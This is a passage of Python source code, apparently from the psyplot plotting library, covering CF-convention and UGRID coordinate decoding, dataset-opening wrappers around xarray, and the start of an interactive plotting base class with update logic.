"""Get the name of the t-dimension
This method gives the name of the time dimension
Parameters
----------
var: xarray.Variables
The variable to get the dimension for
coords: dict
The coordinates to use for checking the axis attribute. If None,
they are not used
Returns
-------
str or None
The coordinate name or None if no time coordinate could be found
See Also
--------
get_t"""
if coords is not None:
coord = self.get_variable_by_axis(var, 't', coords)
if coord is not None and coord.name in var.dims:
return coord.name
dimlist = list(self.t.intersection(var.dims))
if dimlist:
if len(dimlist) > 1:
warn("Found multiple matches for t coordinate in the variable:"
"%s. I use %s" % (', '.join(dimlist), dimlist[0]),
PsyPlotRuntimeWarning)
return dimlist[0]
# otherwise we return None
return None
def get_idims(self, arr, coords=None):
"""Get the coordinates in the :attr:`ds` dataset as int or slice
This method returns a mapping from the coordinate names of the given
`arr` to an integer, slice or an array of integer that represent the
coordinates in the :attr:`ds` dataset and can be used to extract the
given `arr` via the :meth:`xarray.Dataset.isel` method.
Parameters
----------
arr: xarray.DataArray
The data array for which to get the dimensions as integers, slices
or list of integers from the dataset in the :attr:`ds` attribute
coords: iterable
The coordinates to use. If not given all coordinates in the
``arr.coords`` attribute are used
Returns
-------
dict
Mapping from coordinate name to integer, list of integer or slice
See Also
--------
xarray.Dataset.isel, InteractiveArray.idims"""
if coords is None:
coords = arr.coords
else:
coords = {
label: coord for label, coord in six.iteritems(arr.coords)
if label in coords}
ret = self.get_coord_idims(coords)
# handle the coordinates that are not in the dataset
missing = set(arr.dims).difference(ret)
if missing:
warn('Could not get slices for the following dimensions: %r' % (
missing, ), PsyPlotRuntimeWarning)
return ret
def get_coord_idims(self, coords):
"""Get the slicers for the given coordinates from the base dataset
This method converts `coords` to slicers (list of
integers or ``slice`` objects)
Parameters
----------
coords: dict
A subset of the ``ds.coords`` attribute of the base dataset
:attr:`ds`
Returns
-------
dict
Mapping from coordinate name to integer, list of integer or slice
"""
ret = dict(
(label, get_index_from_coord(coord, self.ds.indexes[label]))
for label, coord in six.iteritems(coords)
if label in self.ds.indexes)
return ret
@docstrings.get_sections(base='CFDecoder.get_plotbounds', sections=[
'Parameters', 'Returns'])
@dedent
def get_plotbounds(self, coord, kind=None, ignore_shape=False):
"""
Get the bounds of a coordinate
This method first checks the ``'bounds'`` attribute of the given
`coord` and if it fails, it calculates them.
Parameters
----------
coord: xarray.Coordinate
The coordinate to get the bounds for
kind: str
The interpolation method (see :func:`scipy.interpolate.interp2d`)
that is used in case of a 2-dimensional coordinate
ignore_shape: bool
If True and the `coord` has a ``'bounds'`` attribute, this
attribute is returned without further check. Otherwise we try to
bring the ``'bounds'`` into a format suitable for (e.g.) the
:func:`matplotlib.pyplot.pcolormesh` function.
Returns
-------
bounds: np.ndarray
The bounds with the same number of dimensions as `coord` but one
additional entry per dimension (i.e. if `coord` has shape (4, ),
`bounds` will have shape (5, ), and if `coord` has shape (4, 5),
`bounds` will have shape (5, 6))"""
if 'bounds' in coord.attrs:
bounds = self.ds.coords[coord.attrs['bounds']]
if ignore_shape:
return bounds.values.ravel()
if not bounds.shape[:-1] == coord.shape:
# extract the bounds variable that matches the slice of `coord`
bounds = self.ds.isel(**self.get_idims(coord))[
coord.attrs['bounds']]
try:
return self._get_plotbounds_from_cf(coord, bounds)
except ValueError as e:
warn((e.message if six.PY2 else str(e)) +
" Bounds are calculated automatically!")
return self._infer_interval_breaks(coord, kind=kind)
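# Sketch: for a 1D coordinate without a ``'bounds'`` attribute, the plot
# bounds are interpolated, so a coordinate of shape (4,) yields bounds of
# shape (5,). Made-up values:
#
#     >>> import numpy as np
#     >>> import xarray as xr
#     >>> ds = xr.Dataset(coords={'lon': ('lon', np.array([0., 1., 2., 3.]))})
#     >>> CFDecoder(ds).get_plotbounds(ds.lon)
#     array([-0.5,  0.5,  1.5,  2.5,  3.5])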
@staticmethod
@docstrings.dedent
def _get_plotbounds_from_cf(coord, bounds):
"""
Get plot bounds from the bounds stored as defined by the CF Conventions
Parameters
----------
coord: xarray.Coordinate
The coordinate to get the bounds for
bounds: xarray.DataArray
The bounds as inferred from the attributes of the given `coord`
Returns
-------
%(CFDecoder.get_plotbounds.returns)s
Notes
-----
This currently only works for rectilinear grids."""
if bounds.shape[:-1] != coord.shape or bounds.shape[-1] != 2:
raise ValueError(
"Cannot interprete bounds with shape {0} for {1} "
"coordinate with shape {2}.".format(
bounds.shape, coord.name, coord.shape))
ret = np.zeros(tuple(map(lambda i: i+1, coord.shape)))
ret[tuple(map(slice, coord.shape))] = bounds[..., 0]
last_slices = tuple(slice(-1, None) for _ in coord.shape)
ret[last_slices] = bounds[tuple(chain(last_slices, [1]))]
return ret
docstrings.keep_params('CFDecoder._check_unstructured_bounds.parameters',
'nans')
@docstrings.get_sections(base='CFDecoder.get_triangles', sections=[
'Parameters', 'Returns'])
@docstrings.dedent
def get_triangles(self, var, coords=None, convert_radian=True,
copy=False, src_crs=None, target_crs=None,
nans=None, stacklevel=1):
"""
Get the triangles for the variable
Parameters
----------
var: xarray.Variable or xarray.DataArray
The variable to use
coords: dict
Alternative coordinates to use. If None, the coordinates of the
:attr:`ds` dataset are used
convert_radian: bool
If True and the coordinate has units in 'radian', those are
converted to degrees
copy: bool
If True, vertice arrays are copied
src_crs: cartopy.crs.Crs
The source projection of the data. If not None, a transformation
to the given `target_crs` will be done
target_crs: cartopy.crs.Crs
The target projection for which the triangles shall be transformed.
Must only be provided if the `src_crs` is not None.
%(CFDecoder._check_unstructured_bounds.parameters.nans)s
Returns
-------
matplotlib.tri.Triangulation
The spatial triangles of the variable
Raises
------
ValueError
If `src_crs` is not None and `target_crs` is None"""
warn("The 'get_triangles' method is depreceated and will be removed "
"soon! Use the 'get_cell_node_coord' method!",
DeprecationWarning, stacklevel=stacklevel)
from matplotlib.tri import Triangulation
def get_vertices(axis):
bounds = self._check_unstructured_bounds(var, coords=coords,
axis=axis, nans=nans)[1]
if coords is not None:
bounds = coords.get(bounds.name, bounds)
vertices = bounds.values.ravel()
if convert_radian:
coord = getattr(self, 'get_' + axis)(var)
if coord.attrs.get('units') == 'radian':
vertices = vertices * 180. / np.pi
return vertices if not copy else vertices.copy()
if coords is None:
coords = self.ds.coords
xvert = get_vertices('x')
yvert = get_vertices('y')
if src_crs is not None and src_crs != target_crs:
if target_crs is None:
raise ValueError(
"Found %s for the source crs but got None for the "
"target_crs!" % (src_crs, ))
arr = target_crs.transform_points(src_crs, xvert, yvert)
xvert = arr[:, 0]
yvert = arr[:, 1]
triangles = np.reshape(range(len(xvert)), (len(xvert) // 3, 3))
return Triangulation(xvert, yvert, triangles)
docstrings.delete_params(
'CFDecoder.get_plotbounds.parameters', 'ignore_shape')
@staticmethod
def _infer_interval_breaks(coord, kind=None):
"""
Interpolate the bounds from the data in coord
Parameters
----------
%(CFDecoder.get_plotbounds.parameters.no_ignore_shape)s
Returns
-------
%(CFDecoder.get_plotbounds.returns)s
Notes
-----
This currently only works for rectilinear grids."""
if coord.ndim == 1:
return _infer_interval_breaks(coord)
elif coord.ndim == 2:
from scipy.interpolate import interp2d
kind = kind or rcParams['decoder.interp_kind']
y, x = map(np.arange, coord.shape)
new_x, new_y = map(_infer_interval_breaks, [x, y])
coord = np.asarray(coord)
return interp2d(x, y, coord, kind=kind, copy=False)(new_x, new_y)
@classmethod
@docstrings.get_sections(base='CFDecoder._decode_ds')
@docstrings.dedent
def _decode_ds(cls, ds, gridfile=None, decode_coords=True,
decode_times=True):
"""
Class method to decode coordinates and time information
This method interprets absolute time information (stored with units
``'day as %Y%m%d.%f'``) and coordinates
Parameters
----------
%(CFDecoder.decode_coords.parameters)s
decode_times : bool, optional
If True, decode times encoded in the standard NetCDF datetime
format into datetime objects. Otherwise, leave them encoded as
numbers.
decode_coords : bool, optional
If True, decode the 'coordinates' attribute to identify coordinates
in the resulting dataset."""
if decode_coords:
ds = cls.decode_coords(ds, gridfile=gridfile)
if decode_times:
for k, v in six.iteritems(ds.variables):
# check for absolute time units and make sure the data is not
# already decoded via dtype check
if v.attrs.get('units', '') == 'day as %Y%m%d.%f' and (
np.issubdtype(v.dtype, np.float64)):
decoded = xr.Variable(
v.dims, AbsoluteTimeDecoder(v), attrs=v.attrs,
encoding=v.encoding)
ds.update({k: decoded})
return ds
@classmethod
@docstrings.dedent
def decode_ds(cls, ds, *args, **kwargs):
"""
Class method to decode coordinates and time information
This method interprets absolute time information (stored with units
``'day as %Y%m%d.%f'``) and coordinates
Parameters
----------
%(CFDecoder._decode_ds.parameters)s
Returns
-------
xarray.Dataset
The decoded dataset"""
for decoder_cls in cls._registry + [CFDecoder]:
ds = decoder_cls._decode_ds(ds, *args, **kwargs)
return ds
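# Sketch of the absolute time decoding handled by ``decode_ds``: a float
# value like 20150101.5 with units ``'day as %Y%m%d.%f'`` is interpreted as
# noon on January 1st, 2015 (the variable name ``atime`` is hypothetical):
#
#     >>> import numpy as np
#     >>> import xarray as xr
#     >>> ds = xr.Dataset({'atime': ('time', np.array([20150101.5]),
#     ...                            {'units': 'day as %Y%m%d.%f'})})
#     >>> decoded = CFDecoder.decode_ds(ds)
#     >>> decoded['atime'].values  # roughly datetime64 2015-01-01T12:00:00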
def correct_dims(self, var, dims={}, remove=True):
"""Expands the dimensions to match the dims in the variable
Parameters
----------
var: xarray.Variable
The variable to get the data for
dims: dict
a mapping from dimension to the slices
remove: bool
If True, dimensions in `dims` that are not in the dimensions of
`var` are removed"""
method_mapping = {'x': self.get_xname,
'z': self.get_zname, 't': self.get_tname}
dims = dict(dims)
if self.is_unstructured(var): # we assume a one-dimensional grid
method_mapping['y'] = self.get_xname
else:
method_mapping['y'] = self.get_yname
for key in six.iterkeys(dims.copy()):
if key in method_mapping and key not in var.dims:
dim_name = method_mapping[key](var, self.ds.coords)
if dim_name in dims:
dims.pop(key)
else:
new_name = method_mapping[key](var)
if new_name is not None:
dims[new_name] = dims.pop(key)
# now remove the unnecessary dimensions
if remove:
for key in set(dims).difference(var.dims):
dims.pop(key)
self.logger.debug(
"Could not find a dimensions matching %s in variable %s!",
key, var)
return dims
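# Sketch: ``correct_dims`` translates the abstract keys 'x', 'y', 'z' and
# 't' into the actual dimension names of the variable. Assuming a
# hypothetical decoder for a dataset with a variable ``t2m`` that has the
# dimensions ('time', 'lat', 'lon'), one would expect something like
#
#     >>> decoder.correct_dims(ds.t2m, {'t': 0, 'x': 5})
#     {'time': 0, 'lon': 5}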
def standardize_dims(self, var, dims={}):
"""Replace the coordinate names through x, y, z and t
Parameters
----------
var: xarray.Variable
The variable to use the dimensions of
dims: dict
The dictionary to use for replacing the original dimensions
Returns
-------
dict
The dictionary with replaced dimensions"""
dims = dict(dims)
name_map = {self.get_xname(var, self.ds.coords): 'x',
self.get_yname(var, self.ds.coords): 'y',
self.get_zname(var, self.ds.coords): 'z',
self.get_tname(var, self.ds.coords): 't'}
for dim in set(dims).intersection(name_map):
dims[name_map[dim]] = dims.pop(dim)
return dims
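# Sketch: ``standardize_dims`` goes the other way round and replaces the
# concrete dimension names by the abstract keys (same hypothetical
# ('time', 'lat', 'lon') variable as above):
#
#     >>> decoder.standardize_dims(ds.t2m, {'time': 0, 'lon': 5})
#     {'t': 0, 'x': 5}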
class UGridDecoder(CFDecoder):
"""
Decoder for UGrid data sets
Warnings
--------
Currently only triangles are supported."""
def is_unstructured(self, *args, **kwargs):
"""Reimpletemented to return always True. Any ``*args`` and ``**kwargs``
are ignored"""
return True
def get_mesh(self, var, coords=None):
"""Get the mesh variable for the given `var`
Parameters
----------
var: xarray.Variable
The data source with the ``'mesh'`` attribute
coords: dict
The coordinates to use. If None, the coordinates of the dataset of
this decoder are used
Returns
-------
xarray.Coordinate
The mesh coordinate"""
mesh = var.attrs.get('mesh')
if mesh is None:
return None
if coords is None:
coords = self.ds.coords
return coords.get(mesh, self.ds.coords.get(mesh))
@classmethod
@docstrings.dedent
def can_decode(cls, ds, var):
"""
Check whether the given variable can be decoded.
Returns True if a mesh coordinate could be found via the
:meth:`get_mesh` method
Parameters
----------
%(CFDecoder.can_decode.parameters)s
Returns
-------
%(CFDecoder.can_decode.returns)s"""
return cls(ds).get_mesh(var) is not None
@docstrings.dedent
def get_triangles(self, var, coords=None, convert_radian=True, copy=False,
src_crs=None, target_crs=None, nans=None, stacklevel=1):
"""
Get the triangles for the given variable.
Parameters
----------
%(CFDecoder.get_triangles.parameters)s
Returns
-------
%(CFDecoder.get_triangles.returns)s
Notes
-----
If the ``'location'`` attribute is set to ``'node'``, a delaunay
triangulation is performed using the
:class:`matplotlib.tri.Triangulation` class.
.. todo::
Implement the visualization for UGrid data shown on the edge of the
triangles"""
warn("The 'get_triangles' method is depreceated and will be removed "
"soon! Use the 'get_cell_node_coord' method!",
DeprecationWarning, stacklevel=stacklevel)
from matplotlib.tri import Triangulation
if coords is None:
coords = self.ds.coords
def get_coord(coord):
return coords.get(coord, self.ds.coords.get(coord))
mesh = self.get_mesh(var, coords)
nodes = self.get_nodes(mesh, coords)
if any(n is None for n in nodes):
raise ValueError("Could not find the nodes variables!")
xvert, yvert = nodes
xvert = xvert.values
yvert = yvert.values
loc = var.attrs.get('location', 'face')
if loc == 'face':
triangles = get_coord(
mesh.attrs.get('face_node_connectivity', ''))
if triangles is None:
raise ValueError(
"Could not find the connectivity information!")
# access the values only after the None check
triangles = triangles.values
elif loc == 'node':
triangles = None
else:
raise ValueError(
"Could not interprete location attribute (%s) of mesh "
"variable %s!" % (loc, mesh.name))
if convert_radian:
# convert the extracted vertices; rebinding the loop variable
# would have no effect
if nodes[0].attrs.get('units') == 'radian':
xvert = xvert * 180. / np.pi
if nodes[1].attrs.get('units') == 'radian':
yvert = yvert * 180. / np.pi
if src_crs is not None and src_crs != target_crs:
if target_crs is None:
raise ValueError(
"Found %s for the source crs but got None for the "
"target_crs!" % (src_crs, ))
xvert = xvert[triangles].ravel()
yvert = yvert[triangles].ravel()
arr = target_crs.transform_points(src_crs, xvert, yvert)
xvert = arr[:, 0]
yvert = arr[:, 1]
if loc == 'face':
triangles = np.reshape(range(len(xvert)), (len(xvert) // 3,
3))
return Triangulation(xvert, yvert, triangles)
@docstrings.dedent
def get_cell_node_coord(self, var, coords=None, axis='x', nans=None):
"""
Get the coordinates of the nodes that define each grid cell of `var`
Parameters
----------
%(CFDecoder.get_cell_node_coord.parameters)s
Returns
-------
%(CFDecoder.get_cell_node_coord.returns)s"""
if coords is None:
coords = self.ds.coords
idims = self.get_coord_idims(coords)
def get_coord(coord):
coord = coords.get(coord, self.ds.coords.get(coord))
if coord is None:
# let the caller handle missing coordinates
return None
return coord.isel(**{d: sl for d, sl in idims.items()
if d in coord.dims})
mesh = self.get_mesh(var, coords)
if mesh is None:
return
nodes = self.get_nodes(mesh, coords)
if not len(nodes):
raise ValueError("Could not find the nodes variables for the %s "
"coordinate!" % axis)
vert = nodes[0 if axis == 'x' else 1]
if vert is None:
raise ValueError("Could not find the nodes variables for the %s "
"coordinate!" % axis)
loc = var.attrs.get('location', 'face')
if loc == 'node':
# we assume a triangular grid and use matplotlibs triangulation
from matplotlib.tri import Triangulation
xvert, yvert = nodes
triangles = Triangulation(xvert, yvert)
if axis == 'x':
bounds = triangles.x[triangles.triangles]
else:
bounds = triangles.y[triangles.triangles]
elif loc in ['edge', 'face']:
connectivity = get_coord(
mesh.attrs.get('%s_node_connectivity' % loc, ''))
if connectivity is None:
raise ValueError(
"Could not find the connectivity information!")
connectivity = connectivity.values
bounds = vert.values[
np.where(np.isnan(connectivity), connectivity[:, :1],
connectivity).astype(int)]
else:
raise ValueError(
"Could not interprete location attribute (%s) of mesh "
"variable %s!" % (loc, mesh.name))
dim0 = '__face' if loc == 'node' else var.dims[-1]
return xr.DataArray(
bounds,
coords={key: val for key, val in coords.items()
if (dim0, ) == val.dims},
dims=(dim0, '__bnds', ),
name=vert.name + '_bnds', attrs=vert.attrs.copy())
@staticmethod
@docstrings.dedent
def decode_coords(ds, gridfile=None):
"""
Reimplemented to set the mesh variables as coordinates
Parameters
----------
%(CFDecoder.decode_coords.parameters)s
Returns
-------
%(CFDecoder.decode_coords.returns)s"""
extra_coords = set(ds.coords)
for var in six.itervalues(ds.variables):
if 'mesh' in var.attrs:
mesh = var.attrs['mesh']
if mesh not in extra_coords:
extra_coords.add(mesh)
try:
mesh_var = ds.variables[mesh]
except KeyError:
warn('Could not find mesh variable %s' % mesh)
continue
if 'node_coordinates' in mesh_var.attrs:
extra_coords.update(
mesh_var.attrs['node_coordinates'].split())
if 'face_node_connectivity' in mesh_var.attrs:
extra_coords.add(
mesh_var.attrs['face_node_connectivity'])
if gridfile is not None:
if not isinstance(gridfile, xr.Dataset):
gridfile = open_dataset(gridfile)
# only merge the grid file variables if a grid file was given
ds.update({k: v for k, v in six.iteritems(gridfile.variables)
if k in extra_coords})
if xr_version < (0, 11):
ds.set_coords(extra_coords.intersection(ds.variables),
inplace=True)
else:
ds._coord_names.update(extra_coords.intersection(ds.variables))
return ds
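# A minimal sketch of the UGRID metadata this decoder looks for (all names
# are hypothetical). In CDL notation:
#
#     double temperature(ncells) ;
#         temperature:mesh = "Mesh2" ;
#         temperature:location = "face" ;
#     int Mesh2 ;
#         Mesh2:node_coordinates = "Mesh2_node_x Mesh2_node_y" ;
#         Mesh2:face_node_connectivity = "Mesh2_face_nodes" ;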
def get_nodes(self, coord, coords):
"""Get the variables containing the definition of the nodes
Parameters
----------
coord: xarray.Coordinate
The mesh variable
coords: dict
The coordinates to use to get node coordinates"""
def get_coord(coord):
return coords.get(coord, self.ds.coords.get(coord))
return list(map(get_coord,
coord.attrs.get('node_coordinates', '').split()[:2]))
@docstrings.dedent
def get_x(self, var, coords=None):
"""
Get the centers of the triangles in the x-dimension
Parameters
----------
%(CFDecoder.get_y.parameters)s
Returns
-------
%(CFDecoder.get_y.returns)s"""
if coords is None:
coords = self.ds.coords
# first we try the super class
ret = super(UGridDecoder, self).get_x(var, coords)
# but if that doesn't work because we get the variable name in the
# dimension of `var`, we use the means of the triangles
if ret is None or ret.name in var.dims or (hasattr(var, 'mesh') and
ret.name == var.mesh):
bounds = self.get_cell_node_coord(var, axis='x', coords=coords)
if bounds is not None:
centers = bounds.mean(axis=-1)
x = self.get_nodes(self.get_mesh(var, coords), coords)[0]
try:
cls = xr.IndexVariable
except AttributeError: # xarray < 0.9
cls = xr.Coordinate
return cls(x.name, centers, attrs=x.attrs.copy())
else:
return ret
@docstrings.dedent
def get_y(self, var, coords=None):
"""
Get the centers of the triangles in the y-dimension
Parameters
----------
%(CFDecoder.get_y.parameters)s
Returns
-------
%(CFDecoder.get_y.returns)s"""
if coords is None:
coords = self.ds.coords
# first we try the super class
ret = super(UGridDecoder, self).get_y(var, coords)
# but if that doesn't work because we get the variable name in the
# dimension of `var`, we use the means of the triangles
if ret is None or ret.name in var.dims or (hasattr(var, 'mesh') and
ret.name == var.mesh):
bounds = self.get_cell_node_coord(var, axis='y', coords=coords)
if bounds is not None:
centers = bounds.mean(axis=-1)
y = self.get_nodes(self.get_mesh(var, coords), coords)[1]
try:
cls = xr.IndexVariable
except AttributeError: # xarray < 0.9
cls = xr.Coordinate
return cls(y.name, centers, attrs=y.attrs.copy())
else:
return ret
# register the UGridDecoder
CFDecoder.register_decoder(UGridDecoder)
docstrings.keep_params('CFDecoder.decode_coords.parameters', 'gridfile')
docstrings.get_sections(inspect.cleandoc(
xr.open_dataset.__doc__.split('\n', 1)[1]),
'xarray.open_dataset')
docstrings.delete_params('xarray.open_dataset.parameters', 'engine')
@docstrings.get_sections(base='open_dataset')
@docstrings.dedent
def open_dataset(filename_or_obj, decode_cf=True, decode_times=True,
decode_coords=True, engine=None, gridfile=None, **kwargs):
"""
Open an instance of :class:`xarray.Dataset`.
This function has the same functionality as the
:func:`xarray.open_dataset` function except that it supports an
additional ``'gdal'`` engine to open GDAL rasters (e.g. GeoTiffs) and
that it supports absolute time units like ``'day as %Y%m%d.%f'`` (if
`decode_cf` and `decode_times` are True).
Parameters
----------
%(xarray.open_dataset.parameters.no_engine)s
engine: {'netcdf4', 'scipy', 'pydap', 'h5netcdf', 'gdal'}, optional
Engine to use when reading netCDF files. If not provided, the default
engine is chosen based on available dependencies, with a preference for
'netcdf4'.
%(CFDecoder.decode_coords.parameters.gridfile)s
Returns
-------
xarray.Dataset
The dataset that contains the variables from `filename_or_obj`"""
# use the absolute path name (this is safer when saving the project)
if isstring(filename_or_obj) and osp.exists(filename_or_obj):
filename_or_obj = osp.abspath(filename_or_obj)
if engine == 'gdal':
from psyplot.gdal_store import GdalStore
filename_or_obj = GdalStore(filename_or_obj)
engine = None
ds = xr.open_dataset(filename_or_obj, decode_cf=decode_cf,
decode_coords=False, engine=engine,
decode_times=decode_times, **kwargs)
if isstring(filename_or_obj):
ds.psy.filename = filename_or_obj
if decode_cf:
ds = CFDecoder.decode_ds(
ds, decode_coords=decode_coords, decode_times=decode_times,
gridfile=gridfile)
return ds
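# Sketch of typical calls (all file names are hypothetical):
#
#     >>> ds = open_dataset('data.nc')
#     >>> ds = open_dataset('raster.tif', engine='gdal')  # GDAL raster
#     >>> ds = open_dataset('icon-data.nc', gridfile='icon-grid.nc')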
docstrings.get_sections(
inspect.cleandoc(xr.open_mfdataset.__doc__.split('\n', 1)[1]),
'xarray.open_mfdataset')
docstrings.delete_params('xarray.open_mfdataset.parameters', 'engine')
docstrings.keep_params('get_tdata.parameters', 't_format')
docstrings.params['xarray.open_mfdataset.parameters.no_engine'] = \
docstrings.params['xarray.open_mfdataset.parameters.no_engine'].replace(
'**kwargs', '``**kwargs``').replace('"path/to/my/files/*.nc"',
'``"path/to/my/files/*.nc"``')
docstrings.keep_params('open_dataset.parameters', 'engine')
@docstrings.dedent
def open_mfdataset(paths, decode_cf=True, decode_times=True,
decode_coords=True, engine=None, gridfile=None,
t_format=None, **kwargs):
"""
Open multiple files as a single dataset.
This function is essentially the same as :func:`xarray.open_mfdataset`
but (like :func:`open_dataset`) supports additional decoding and the
``'gdal'`` engine.
You can further specify the `t_format` parameter to extract the time
information from the file names and use the result to concatenate the
files along the time dimension
Parameters
----------
%(xarray.open_mfdataset.parameters.no_engine)s
%(open_dataset.parameters.engine)s
%(get_tdata.parameters.t_format)s
%(CFDecoder.decode_coords.parameters.gridfile)s
Returns
-------
xarray.Dataset
The dataset that contains the variables from `paths`"""
if t_format is not None or engine == 'gdal':
if isinstance(paths, six.string_types):
paths = sorted(glob(paths))
if not paths:
raise IOError('no files to open')
if t_format is not None:
time, paths = get_tdata(t_format, paths)
kwargs['concat_dim'] = 'time'
if xr_version > (0, 11):
kwargs['combine'] = 'nested'
if all(map(isstring, paths)):
filenames = list(paths)
else:
filenames = None
if engine == 'gdal':
from psyplot.gdal_store import GdalStore
paths = list(map(GdalStore, paths))
engine = None
if xr_version < (0, 18):
kwargs['lock'] = False
ds = xr.open_mfdataset(
paths, decode_cf=decode_cf, decode_times=decode_times, engine=engine,
decode_coords=False, **kwargs)
ds.psy.filename = filenames
if decode_cf:
ds = CFDecoder.decode_ds(ds, gridfile=gridfile,
decode_coords=decode_coords,
decode_times=decode_times)
ds.psy._concat_dim = kwargs.get('concat_dim')
ds.psy._combine = kwargs.get('combine')
if t_format is not None:
ds['time'] = time
return ds
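# Sketch (hypothetical file pattern): concatenate monthly files along the
# time dimension, taking the time stamps from the file names:
#
#     >>> ds = open_mfdataset('data_*.nc', t_format='data_%Y%m.nc')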
class InteractiveBase(object):
"""Class for the communication of a data object with a suitable plotter
This class serves as an interface for data objects (in particular as a
base for :class:`InteractiveArray` and :class:`InteractiveList`) to
communicate with the corresponding :class:`~psyplot.plotter.Plotter` in the
:attr:`plotter` attribute"""
#: The :class:`psyplot.project.DataArrayPlotter`
_plot = None
@property
def plotter(self):
""":class:`psyplot.plotter.Plotter` instance that makes the interactive
plotting of the data"""
return self._plotter
@plotter.setter
def plotter(self, value):
self._plotter = value
@plotter.deleter
def plotter(self):
self._plotter = None
no_auto_update = property(_no_auto_update_getter,
doc=_no_auto_update_getter.__doc__)
@property
def plot(self):
"""An object to visualize this data object
To make a 2D-plot with the :mod:`psy-simple <psy_simple.plugin>`
plugin, you can just type
.. code-block:: python
plotter = da.psy.plot.plot2d()
It will create a new :class:`psyplot.plotter.Plotter` instance with the
extracted and visualized data.
See Also
--------
psyplot.project.DataArrayPlotter: for the different plot methods"""
if self._plot is None:
import psyplot.project as psy
self._plot = psy.DataArrayPlotter(self)
return self._plot
@no_auto_update.setter
def no_auto_update(self, value):
if self.plotter is not None:
self.plotter.no_auto_update = value
self.no_auto_update.value = bool(value)
@property
def logger(self):
""":class:`logging.Logger` of this instance"""
try:
return self._logger
except AttributeError:
name = '%s.%s.%s' % (self.__module__, self.__class__.__name__,
self.arr_name)
self._logger = logging.getLogger(name)
self.logger.debug('Initializing...')
return self._logger
@logger.setter
def logger(self, value):
self._logger = value
@property
def ax(self):
"""The matplotlib axes the plotter of this data object plots on"""
return None if self.plotter is None else self.plotter.ax
@ax.setter
def ax(self, value):
if self.plotter is None:
raise ValueError(
'Cannot set the axes because the plotter attribute is None!')
self.plotter.ax = value
block_signals = utils._temp_bool_prop(
'block_signals', "Block the emitting of signals of this instance")
# -------------------------------------------------------------------------
# -------------------------------- SIGNALS --------------------------------
# -------------------------------------------------------------------------
#: :class:`Signal` to be emitted when the object has been updated
onupdate = Signal('_onupdate')
_onupdate = None
_plotter = None
@property
@docstrings.get_docstring(base='InteractiveBase._njobs')
@dedent
def _njobs(self):
"""
The number of jobs taken from the queue during an update process
Returns
-------
list of int
The length of the list determines the number of necessary queues,
the numbers in the list determine the number of tasks per queue
this instance fulfills during the update process"""
return self.plotter._njobs if self.plotter is not None else []
@property
def arr_name(self):
""":class:`str`. The internal name of the :class:`InteractiveBase`"""
return self._arr_name
@arr_name.setter
def arr_name(self, value):
self._arr_name = value
try:
del self._logger
except AttributeError:
pass
self.onupdate.emit()
_arr_name = None
_no_auto_update = None
@docstrings.get_sections(base='InteractiveBase')
@dedent
def __init__(self, plotter=None, arr_name='arr0', auto_update=None):
"""
Parameters
----------
plotter: Plotter
Default: None. Interactive plotter that makes the plot via
formatoption keywords.
arr_name: str
Default: ``'arr0'``. Unique name of the array
auto_update: bool
Default: None. A boolean indicating whether this object shall
be updated automatically when calling the
:meth:`update` method or not. See also the :attr:`no_auto_update`
attribute. If None, the value from the ``'lists.auto_update'``
key in the :attr:`psyplot.rcParams` dictionary is used."""
self.plotter = plotter
self.arr_name = arr_name
if auto_update is None:
auto_update = rcParams['lists.auto_update']
self.no_auto_update = not bool(auto_update)
self.replot = False
def _finish_all(self, queues):
for n, queue in zip(safe_list(self._njobs), safe_list(queues)):
if queue is not None:
for i in range(n):
queue.task_done()
@docstrings.get_sections(base='InteractiveBase._register_update')
@dedent
def _register_update(self, replot=False, fmt={}, force=False,
todefault=False):
"""
Register new formatoptions for updating
Parameters
----------
replot: bool
Boolean that determines whether the data specific formatoptions
shall be updated in any case or not. Note, if `dims` is not empty
or any coordinate keyword is in ``**kwargs``, this will be set to
True automatically
fmt: dict
Keys may be any valid formatoption of the formatoptions in the
:attr:`plotter`
force: str, list of str or bool
If a formatoption key (i.e. string) or a list of formatoption keys,
they are updated regardless of whether they changed or not.
If True, all formatoptions given in this call of the
:meth:`update` method are updated
todefault: bool
If True, all changed formatoptions (except the registered ones)
are updated to their default value as stored in the
:attr:`~psyplot.plotter.Plotter.rc` attribute
See Also
--------
start_update"""
self.replot = self.replot or replot
if self.plotter is not None:
self.plotter._register_update(replot=self.replot, fmt=fmt,
force=force, todefault=todefault)
@docstrings.get_sections(base='InteractiveBase.start_update',
sections=['Parameters', 'Returns'])
@dedent
def start_update(self, draw=None, queues=None):
"""
Conduct the formerly registered updates
This method conducts the updates that have been registered via the
:meth:`update` method. You can call this method if the
:attr:`no_auto_update` attribute of this instance and the `auto_update`
parameter in the :meth:`update` method has been set to False
Parameters
----------
draw: bool or None
Boolean to control whether the figure of this array shall be drawn
at the end. If None, it defaults to the ``'auto_draw'`` parameter
in the :attr:`psyplot.rcParams` dictionary
queues: list of :class:`Queue.Queue` instances
The queues that are passed to the
:meth:`psyplot.plotter.Plotter.start_update` method to ensure a
thread-safe update. It can be None if only one single plotter is
updated at the same time. The number of jobs that are taken from
the queue is determined by the :attr:`_njobs` attribute. Note that
this parameter is automatically configured when updating
from a :class:`~psyplot.project.Project`.
Returns
-------
bool
A boolean indicating whether a redrawing is necessary or not
See Also
--------
:attr:`no_auto_update`, update
"""
if self.plotter is not None:
return self.plotter.start_update(draw=draw, queues=queues)
docstrings.keep_params('InteractiveBase.start_update.parameters', 'draw')
@docstrings.get_sections(base='InteractiveBase.update',
sections=['Parameters', 'Notes'])
@docstrings.dedent
def update(self, fmt={}, replot=False, draw=None, auto_update=False,
force=False, todefault=False, **kwargs):
"""
Update the coordinates and the plot
This method updates all arrays in this list with the given coordinate
values and formatoptions.
Parameters
----------
%(InteractiveBase._register_update.parameters)s
auto_update: bool
Boolean determining whether or not the :meth:`start_update` method
is called at the end. This parameter has no effect if the
:attr:`no_auto_update` attribute is set to ``True``.
%(InteractiveBase.start_update.parameters.draw)s
``**kwargs``
Any other formatoption that shall be updated (additionally to those
in `fmt`)
Notes
-----
If the :attr:`no_auto_update` attribute is True and the given
`auto_update` parameter is False, the update of the plots is
registered and conducted at the next call of the :meth:`start_update`
method or the next call of this method (if the `auto_update` parameter
is then True).
"""
fmt = dict(fmt)
fmt.update(kwargs)
self._register_update(replot=replot, fmt=fmt, force=force,
todefault=todefault)
if not self.no_auto_update or auto_update:
self.start_update(draw=draw)
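# Sketch of the two-step update when auto-updating is disabled (``da`` and
# the formatoption name are hypothetical):
#
#     >>> da.psy.no_auto_update = True
#     >>> da.psy.update(cmap='Blues')  # only registers the update
#     >>> da.psy.start_update()        # conducts it and redraws if needed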
def to_interactive_list(self):
